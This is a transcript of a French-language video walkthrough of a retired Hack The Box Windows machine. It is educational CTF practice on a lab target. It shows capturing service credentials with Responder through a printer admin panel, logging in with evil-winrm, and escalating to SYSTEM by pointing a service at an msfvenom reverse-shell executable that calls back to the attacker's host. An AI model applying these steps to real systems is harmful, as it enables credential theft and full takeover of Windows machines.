Bonjour et bienvenue à tous sur cette nouvelle vidéo CTF. Cette fois-ci on est sur la plateforme Hack the Box, donc c'est la première vidéo que je fais sur cette plateforme. Ça va faire quelques semaines, là ça va faire 3-4 semaines que je m'y suis mis vraiment sur Hack the Box. Et voilà, je voulais commencer à faire des vidéos dessus. Alors par contre je peux faire que des box retired, des box retirées. Les box de saison, je peux pas pour l'instant vous les uploader en vidéo. Je les uploaderai quand elles seront retirées du coup, mais j'ai hâte parce que c'était des box vraiment intéressantes. Là c'est une box que je n'ai jamais fait, donc là c'est complètement freestyle, hein, voilà. J'ai choisi une box Windows, hein, parce que comme vous m'aviez demandé de faire plus de Windows, pas que je fasse du reverse aussi d'ailleurs. Voilà, donc j'ai démarré la machine et tout. Je ferai peut-être une vidéo de présentation de la plateforme Hack the Box, je sais pas quand, mais je l'ai fait pour TryHackMe, donc je pourrais le faire aussi pour cette plateforme là. Donc voilà. Alors là, comme c'est une machine retirée, on a accès au compte rendu écrit. Bon, on va pas s'en servir, enfin on va essayer du moins, parce que si je bloque vraiment, faudra bien que je fasse un truc, hein. Mais bon, là c'est en easy, donc j'espère que je vais pas en avoir besoin. J'ai démarré ma VM, etc. Je suis connecté au VPN, donc c'est parti. Je vais faire un scan Nmap sur la machine 241. Donc Nmap, l'adresse IP de la machine qu'on veut scanner, -A majuscule pour faire un scan agressif. Donc je répète, un scan agressif, ça permet de scanner les services et leur version qu'il y a sur chaque port ouvert. Et ça permet aussi d'exécuter des scripts avec Nmap. Nmap va exécuter automatiquement des scripts pour trouver certaines choses en plus. Le premier exemple qui me vient, c'est par exemple sur le FTP, il vérifiera s'il y a le login Anonymous ou pas, entre autres. Alors par contre c'est très peu discret, mais comme on est sur une box, sur Hack the Box, ça pose pas problème. Là ça pose pas problème parce qu'il n'y a pas de système de protection ou quoi, mais c'est très facilement détectable ce type de scan là. Voilà. Donc ensuite -P- pour scanner tous les ports, du port 1 au port 65535, parce que par défaut si on précise pas ça, Nmap va scanner que les 1000 premiers ports. Et ensuite -ON, nmapresults.txt, ça c'est pour enregistrer les résultats du scan dans nmapresults.txt. Comme j'ai dit, maintenant j'essaierai d'expliquer un peu tout, même si je l'explique à chaque vidéo, c'est pas grave. Vaut mieux ça parce que au pire, si vous savez déjà, vous avez juste à passer. Alors que pour quelqu'un qui sait pas justement, c'est un peu dommage si c'est pas expliqué. Et on peut appuyer sur S aussi pendant le scan pour voir. Alors j'ai oublié d'utiliser l'option -D, j'aurais pu. Ça m'aurait évité d'attendre comme ça. L'option -D, ça nous affiche en temps réel les ports qui sont découverts. Voilà, là il est en train de scanner les services maintenant, qui est sur chaque port ouvert. Aussi, il y a un truc maintenant il y a un lien que j'ai mis dans la description dans la dernière vidéo et que je continuerai à mettre dès à présent. C'est le lien d'un serveur Discord sur lequel j'ai été invité, qui est vachement bien, parce que on fait des CTF, en fait on fait des box, justement les box de saison dernièrement qui sont sortis. On les a fait en VOC, donc c'est pas mal, il y a des channels d'entraide et tout. Donc voilà, si vous êtes intéressé, vous avez le lien dans la description. De toute façon, il y aura un petit moment pub pour ce serveur à la fin de chaque vidéo. Alors on a le port 53, donc là on pourra énumérer, alors Simple DNS+, on pourra énumérer les domaines et sous-domaines. Le port 80, on a un serveur web, ok, on a la version Hack the Box Printer Admin Panel. Donc on a un admin panel visiblement, 88 ça c'est pour Kerberos, ok, RPC, 139, il y a le SMB, LDAP. Souvent sur les machines Windows, il y a énormément de ports ouverts, hein, contrairement aux machines sous Linux, hein, j'ai remarqué. Il y a beaucoup plus de services. LDAP, 5985, ça c'est pour Windows Remote Management, WinRM. Si on a des identifiants ou même un hash, je crois qu'on peut utiliser directement un hash si on en a un. On pourra se connecter sur ce port pour avoir un shell en PowerShell. Ça je sais pas du tout ce que c'est, et ça on verra après. Donc je vais commencer par essayer, déjà je vais aller sur le port 80. Donc là visiblement, donc Printer Admin Panel, Settings, qu'est-ce qu'on a dans les Settings? On peut préciser l'adresse du serveur, attendez, mais c'est sérieux ça? Value, ah non c'est des étoiles. Mais on a du coup l'adresse du serveur, le port, username, password. Il faut update, il se passe quoi? Fax. Bon, visiblement les autres pages, enfin les autres boutons nous mènent à rien. Qu'est-ce qu'on pourrait faire avec ça? Déjà il y a une première idée que j'aurais, je sais pas si ça fonctionnera, ce serait de directement
mettre ici notre adresse IP et essayer d'intercepter une requête. Peut-être qu'on pourra capturer un hash, je sais pas. On va essayer ça. 16.24. Ah, visiblement ça le prend pas en compte. Alors peut-être il vérifie d'abord s'il arrive à se connecter. Donc peut-être il faut que je lance responder avant. Responder -i d'une 0. Ah. Ouais, et j'ai récupéré donc visiblement, regardez, j'ai bien reçu la requête. J'ai reçu l'identifiant, hein, mais j'ai aussi le mot de passe. D'accord, on va noter ça. Nano notes.txt credentials. Alors, on va voir ce qu'on peut en faire plus tard de ces identifiants. Mais déjà on a des identifiants, donc peut-être faudrait voir si on peut s'en servir sur le port 5985. J'ai un doute, mais ça coûte rien d'essayer. Donc je vais essayer ça, on va faire EvilWinRM. Donc EvilWinRM, c'est un outil qui permet de se connecter sur le port 5985 d'une machine Windows. Par défaut c'est le port 5985 pour le service Windows Remote Management. Et en fait EvilWinRM c'est un peu plus adapté au pentest en fait, et on a quelques fonctionnalités, par exemple je pense à la fonctionnalité upload, download, voilà, qui nous permettent de s'en servir quand on fait soit du pentest soit des box. Donc d'abord il faut faire tirer, alors attendez, je me rappelle plus des paramètres parce que j'utilise pas souvent, comme je vous ai dit Windows, j'en fais pas souvent des machines Windows. C'est -i, voilà, -i, l'adresse IP que je vais copier, -u, svc-printer, -p et le mot de passe. Alors comme il y a des caractères spéciaux, je mets entre guillemets. Et on a un shell déjà sur la machine, mais incroyable. D'accord, bon ben... ouais, c'était assez rapide. ls. Alors par contre ça m'étonnerait qu'on ait déjà le flag user quand même. Desktop. Bon, après c'est une machine easy. Ah bah si. Après c'est une machine easy. Cat user.txt. On va copier le flag user. Alors par contre clear ne fonctionne pas, je crois. Ouais, donc clear ne fonctionne pas là-dessus. Voilà, je cache le flag. Je vais renseigner le flag ici, submit flag. Bon alors étant donné, je vais mettre very easy, voilà. Allez, submit. C'était quand même relativement facile ce premier flag. Je dirais pas piece of cake non plus parce que c'est pas forcément non plus évident quand on connaît pas trop ça. Maintenant il faut passer admin. Alors étant donné que je suis en tant qu'un utilisateur d'un service, donc SVC Printer, il y a peut-être moyen d'utiliser un exploit type print spoofer. Alors pour vérifier ça déjà, je vais faire who am I /all. Alors j'ai découvert récemment qu'il y avait /all. Moi je m'embêtais à chaque fois à faire d'abord groupe, priv. Oula, ah oui, on a pas mal de privilèges quand même. Alors attendez, on peut ajouter, oui bon ça ok. SE load driver privilege. Oups, pardon. Backup privilège, backup file and directories. On peut faire des backups du coup. Restore file and directories, shutdown the system, bypass driver checking, increase working set privilege. Et on appartient à quel groupe? Server operators. Ça me dit un truc ça. Ça me dit un truc. On va aller sur Actrix, parce que Actrix c'est quand même une valeur sûre. Privileged groups, voilà. Et est-ce qu'il nous parle de server operators ou pas? Il me semblait que oui. J'avais vu ça ici, il me semble. On peut vérifier nos permissions sur un service, ok. pservice.exe, security. Maintenant aussi dans la vidéo je laisserai les parties où je cherche. Bon, je coterai quand il y a des blancs, évidemment. Ouais, donc en fait, si on fait partie de ce groupe, il y a peut-être moyen qu'on puisse modifier un service et l'arrêter, le redémarrer, pour faire exécuter un reverse shell, par exemple, qui du coup sera exécuté en tant que système, utilisateur système. Exécute arbitré, on est escalade privilege, voilà. Backup operator. On fait partie de backup operators ou pas? Non. Print operators. Alors on va garder ça de côté. Je vais juste chercher du coup print. Ah, print operators. Alors les membres de ce groupe peuvent
peuvent utiliser, enfin ont ce privilège SE load driver privilege. Donc on peut charger un driver. Ok. On l'a vu ici. SE load driver privilege enabled. Donc activé. On peut se connecter sur le contrôleur domaine et l'éteindre. Ok. On peut gérer, créer, partager, supprimer des imprimantes qui sont connectées au contrôleur de domaine. D'accord. Abuse SE load driver privilege. On va aller voir ça. Un privilège qu'il est très dangereux d'assigner à un utilisateur, n'importe quel utilisateur. Cela permet à un utilisateur de charger des drivers du kernel et d'exécuter du code avec les privilèges du noyau du kernel, donc NT System ou NT Authority System. On va aller plutôt voir du côté du groupe serveur operator, ce sera peut-être plus simple pour nos privilèges. Ok, blablabla. Bon là il explique comment mettre en place le lab. EvilWin RM, Net User RT, ok là il vérifie qu'il fait bien partie du groupe serveur operators. Et après il liste les services avec Services, voilà. Services. Ah par contre on n'y voit pas bien, je vais agrandir un peu. Je vais retaper la commande. Alors et du coup on voit les services qui sont activés ou pas. Celui-là n'est pas activé. Celui-là évidemment Windows Defender est activé. Ok. Donc eux ils prennent le service VM Tools. Bon on va faire pareil du coup. Après il a transféré net4.exe, ok. Sur lot cible. Après sinon on peut carrément générer un shell interpréteur avec MSF Venom. Je vais essayer ça, hein. Je vais essayer de faire différemment, juste histoire de. Puis j'aime bien avoir un interpréteur quand même. MSF Venom-P Windows slash x64 slash meterpreter slash reverse TCP lhost. Alors l'adresse qui va recevoir le reverse shell, c'est notre adresse sur l'interface tune 0. Le port d'écoute, on va mettre 4242. Le format exe et le fichier de sortie, du coup, ce sera rshell.exe. Voilà. Pendant que ça génère ça, je vais continuer à lire ici. Donc en fait, ce qu'il fait, donc il upload ça, il modifie le service et après, j'imagine qu'il l'arrête et qu'il le relance. Stop et start. Ok, ouais, c'est ça. C'est ça, c'est ça. Ben, on va essayer ça. Hein. Alors normalement je peux faire directement upload rshell.exe. Voilà, et ça c'est bien pratique. Voilà, ça c'est très pratique avec EvilWin RM d'avoir cette fonctionnalité là. Upload. Alors ça marche pas toujours, je sais plus dans quel cas ça ne fonctionne pas, mais là ça fonctionne, donc tant mieux. Donc ensuite sc.exe config, alors je vais juste copier ça. Hop, voilà. Juste vérifier que c'est bien le bon nom du service. VMTools. VMTools, ouais. Et du coup là, il faut mettre le chemin vers notre exécutable anti/rshell.exe. Je vais juste lancer MSF console en dessous pour me mettre sur écoute. Alors je vais faire use multi/handler, donc là on fait use multi/handler en fait pour charger le module multi-handler. C'est un module qui permet donc de gérer les connexions entrantes des reverse shell. Je crois qu'on peut aussi gérer les bind shell, il me semble. Voilà, donc là par contre il faut préciser le payload qu'on a utilisé. Le payload en fait qu'on a utilisé pour générer ce fichier là. Donc on va faire set payload, donc set pour dire qu'on veut définir la variable payload à du coup on avait mis Windows /x64 slash meterpreter slash reverse TCP. Voilà. Ensuite on définit aussi l'adresse d'écoute. Donc moi j'avais mis l'interface tune 0. Il saura tout seul retrouver l'adresse IP qui correspond. Set lport, donc le port d'écoute 4242. Et maintenant je fais run. Et donc là voilà, started reverse TCP handler. Donc là maintenant il est sur écoute sur le port 4242 sur mon adresse IP de l'interface tune 0. Donc maintenant
J'exécute ça. On a bien changé la configuration de ce service, ok. Et maintenant, si je fais sc stop vmtools et que je fais sc start vmtools, ça ne fonctionne pas. Je ne reçois rien. Pourquoi? Si je reliste les services, est-ce que le chemin a bien été changé déjà? Oui. User as scripted reversal.exe. Alors pourquoi ça ne fonctionne pas? J'ai du mal à m'y prendre. Ah, j'ai oublié .exe, c'est sérieux. Stop. Voilà, je stoppe le process. Enfin le service. Je le start ensuite. Ah, sending stage. Donc là on a bien reçu une connexion, on a bien reçu un shell interpreter ici en bas. Et si je fais non pardon, c'est getUID avec un interpreter. Et on est NT Authority System. Alors je pense qu'on est passé par un chemin plus facile, à mon avis il y avait plusieurs chemins possibles. Cette technique là est assez simple parce que je l'avais déjà pratiqué une fois. Par contre l'autre technique qu'on avait vue là avec le groupe print operator, ça m'avait l'air plus compliqué. Alors pourquoi raison died? Tiens, pourquoi died? Étrange, je vais réessayer. Bizarre. Donc si je vais dans ces deux points anti-slash, là faut mettre deux anti-slash sinon c'est bugué. Si je fais ls, je vais aller dans user, je vais vite récupérer le flag root, enfin le flag administrator du coup. ls. On va aller dans desktop, dans le bureau, ls, et on a le flag root, cat root.txt. Et c'est bon, on a le flag root. Je vais copier ça. Alors par contre, je sais pas pourquoi mon interpréteur fait que mourir. Fait que se fermer. Étrange. Je vais juste renseigner le flag root avant et je vais regarder ensuite s'il y a moyen de changer ça. Donc hop, submit. Alors là je vais mettre easy, c'était relativement easy quand même. Hein. Par rapport à d'autres box que j'ai pu essayer de faire. Et donc on a terminé cette box. Donc ouais, c'était plutôt pas mal. C'est une bonne box pour débuter. Enfin pour débuter. Pour commencer à s'entraîner sur Windows. Moi j'avais déjà commencé à m'entraîner il y a un moment sur TryHackMe. Mais je suis vraiment pas très doué. Donc moi c'est le genre de box qui me convient bien pour l'instant sur Windows. Je vais juste regarder s'il n'y a pas moyen d'éviter que mon interpréteur se ferme à chaque fois. Alors à mon avis, je pense avoir une idée de pourquoi ça fait ça. À mon avis, c'est parce qu'il faut préciser qu'on veut un exe service de type service, qui servira pour un service du coup. C'est pas un exe classique qu'on exécute et c'est bon. Je pense que Windows, en fait, avec les services, les exécutables du service, à mon avis, alors là c'est à vérifier, mais à mon avis, quand a l'impression que le service plante en fait, parce qu'il stagne en fait, il reste, l'exé ne fait rien, il reste bloqué dans l'exé en fait, je pense. Tant que le reversal est ouvert, à mon avis, il doit se dire que bah, le service a planté, du coup il ferme le processus de force peut-être. Je ne sais pas. Donc j'ai régénéré le fichier sous un différent format. Je vais relancer MSF console. Tel rshell.exe, je vais supprimer le fichier rshell.exe. Voilà. Je vais faire upload. Du coup rshell tab, j'appuie sur tab en fait et il me complète automatiquement le chemin complet. Oui, parce que en fait quand vous voulez upload ou download un fichier, il faut rentrer les chemins complets en fait. Il prend pas en charge les chemins relatifs. Donc j'exécute ça. Là c'était un peu plus long parce qu'il est un peu plus lourd le fichier. Voilà. Je vais refaire multi/handler set payload Windows /64/reverse -tcp. Oh pardon.
Meterpreter slash reverse-du-bas TCP 7L host 0 7L port 42 run. Et maintenant si je réessaye de faire sc.exe, mince, sc.exe stop vm tools, pardon avec un T majuscule, ah, il n'est pas démarré, et start, je reçois bien une connexion, ok, j'ai bien un shell meterpreter, ok, on va voir s'il se ferme au bout d'un moment. Je viens de voir ici qu'on avait eu cette erreur là quand on avait démarré le service en fait. The service did not respond to the start or control request in a timely fashion. Alors faudra que je regarde en détail pourquoi ça fonctionne comme ça, qu'est-ce qu'il y a de différent avec les exés les fichiers exe des services. Et visiblement c'était ça, donc là notre meterpreter n'est plus fermé. Donc voilà, faites attention, ça j'avais oublié ce détail. Quand vous utilisez un exe comme ça pour l'utiliser avec un service, comme j'ai fait là, sur Windows, faites attention, si vous générez votre fichier avec MSF Venom, à bien préciser le format exe-service et pas juste exe, parce que sinon votre reverse shell va se fermer à chaque fois au bout d'un certain temps. Mais voilà, du coup on est admin. Bon, c'était plutôt cool comme room, hein. Alors là j'ai bien pris le temps, il y aura moins de cuts aussi, la vidéo sera peut-être plus longue, mais je pense que c'est mieux comme ça. Donc du coup, qu'est-ce qu'on a fait dans cette room? Dans cette room, on a fait de l'énumération classique comme d'habitude avec Nmap, hein, ça on le fait à chaque fois, énumérer les ports et les services qui sont accessibles sur la machine. Ensuite on a utilisé Responder pour capturer un hash de l'utilisateur SVC SVC Printer, je ne me rappelle plus exactement, mais en fait on avait accès sur le site web, on pouvait directement configurer le serveur d'impression, je pense qu'on appelle ça comme ça, et en fait on a pu mettre notre adresse IP, ce qui a eu pour effet de faire en sorte que le serveur cible nous envoie une requête à nous, à notre adresse IP, et avec Responder on a pu capturer le hash, enfin le mot de passe carrément en texte clair. On a pu capturer le mot de passe qui était contenu dans la requête que le serveur nous envoyait. On a pu choper le mot de passe de l'utilisateur SVC Printer. Donc ensuite on a pu s'en servir pour se connecter sur le service WinRM, Windows Remote Management, sur le port 5985. Et après ça, du coup, on avait accès à la machine, du coup on avait un foothold, donc un pied dans la machine. Et ensuite on a pu élever nos privilèges, vu qu'on faisait partie du groupe Server Operators, pardon. Oui c'était ça, on faisait partie du groupe Server Operators. On avait les droits pour modifier des services, les arrêter et les relancer. Et du coup on a juste eu à prendre un service qui du coup tournait en tant que NT Authority System. On a modifié le fichier .exe de ce service là en fait, enfin on a modifié le service pour qu'il utilise un .exe qu'on génère nous-mêmes, qui contient reverse shell, qu'on a généré avec MSF Venom. Et ensuite du coup on a juste eu à arrêter ce service, à le relancer, et on a reçu un reverse shell en tant que NT Authority System, donc qui est l'utilisateur suprême on va dire sur une machine Windows. Donc voilà, c'était plutôt cool comme room. J'ai pas l'habitude de faire des rooms sur Windows, ça là était assez simple je trouve. Je pense qu'il y avait plusieurs chemins, je vais pas faire tous les chemins là en une vidéo je pense, mais je pense que je me repencherai dessus pour essayer l'autre méthode avec le groupe Printer Operators qui avait l'air quand même bien plus compliqué. Mais voilà. Petit moment pub pour vous parler du serveur Discord CTF Hacking France, donc si vous êtes intéressé par les CTF, la cyber, vous pouvez venir sur ce serveur pour partager, vous entraider, etc. Parfois on fait justement des rooms à plusieurs en vocal, voilà, si ça vous intéresse, le lien est dans la description. Donc si ça vous a plu, n'hésitez pas à mettre un pouce bleu, vous aurez comme d'habitude le sommaire en description, hein. Vous pourrez cliquer directement sur les timecodes pour aller à l'étape que vous voulez. Vous aurez aussi normalement le compte rendu, alors vous l'aurez peut-être pas de suite au moment où la vidéo sort, mais j'essaierai de le faire dans les temps quand même. J'ai d'autres comptes rendus que j'ai toujours pas fait aussi, je suis un peu en retard là-dessus. Vous aurez du coup le lien de la room évidemment. Alors par contre c'est les rooms retirés, donc toutes les rooms que je ferai en vidéo sur Hack-the-Box, ce sera forcément des rooms retirés du coup. Et du coup les rooms retirés sur Hack-the-Box sont accessibles seulement VIP par contre, je tiens à préciser, mais c'est parce que c'est le seul room que je peux faire en fait en vidéo, que je peux publier. On n'a pas le droit de faire ça sur des rooms actives, mais sachez que vous avez accès aux rooms actives sans VIP, ça vous y avez accès. Donc voilà, n'hésitez pas à lâcher un pouce bleu. Si vous voulez suivre les prochaines vidéos qui sortiront, hein, que ce soit des vidéos gaming, des vidéos sur Try Hack Me, Hack-the-Box, n'hésitez pas à vous abonner, et moi je vous dis à la prochaine.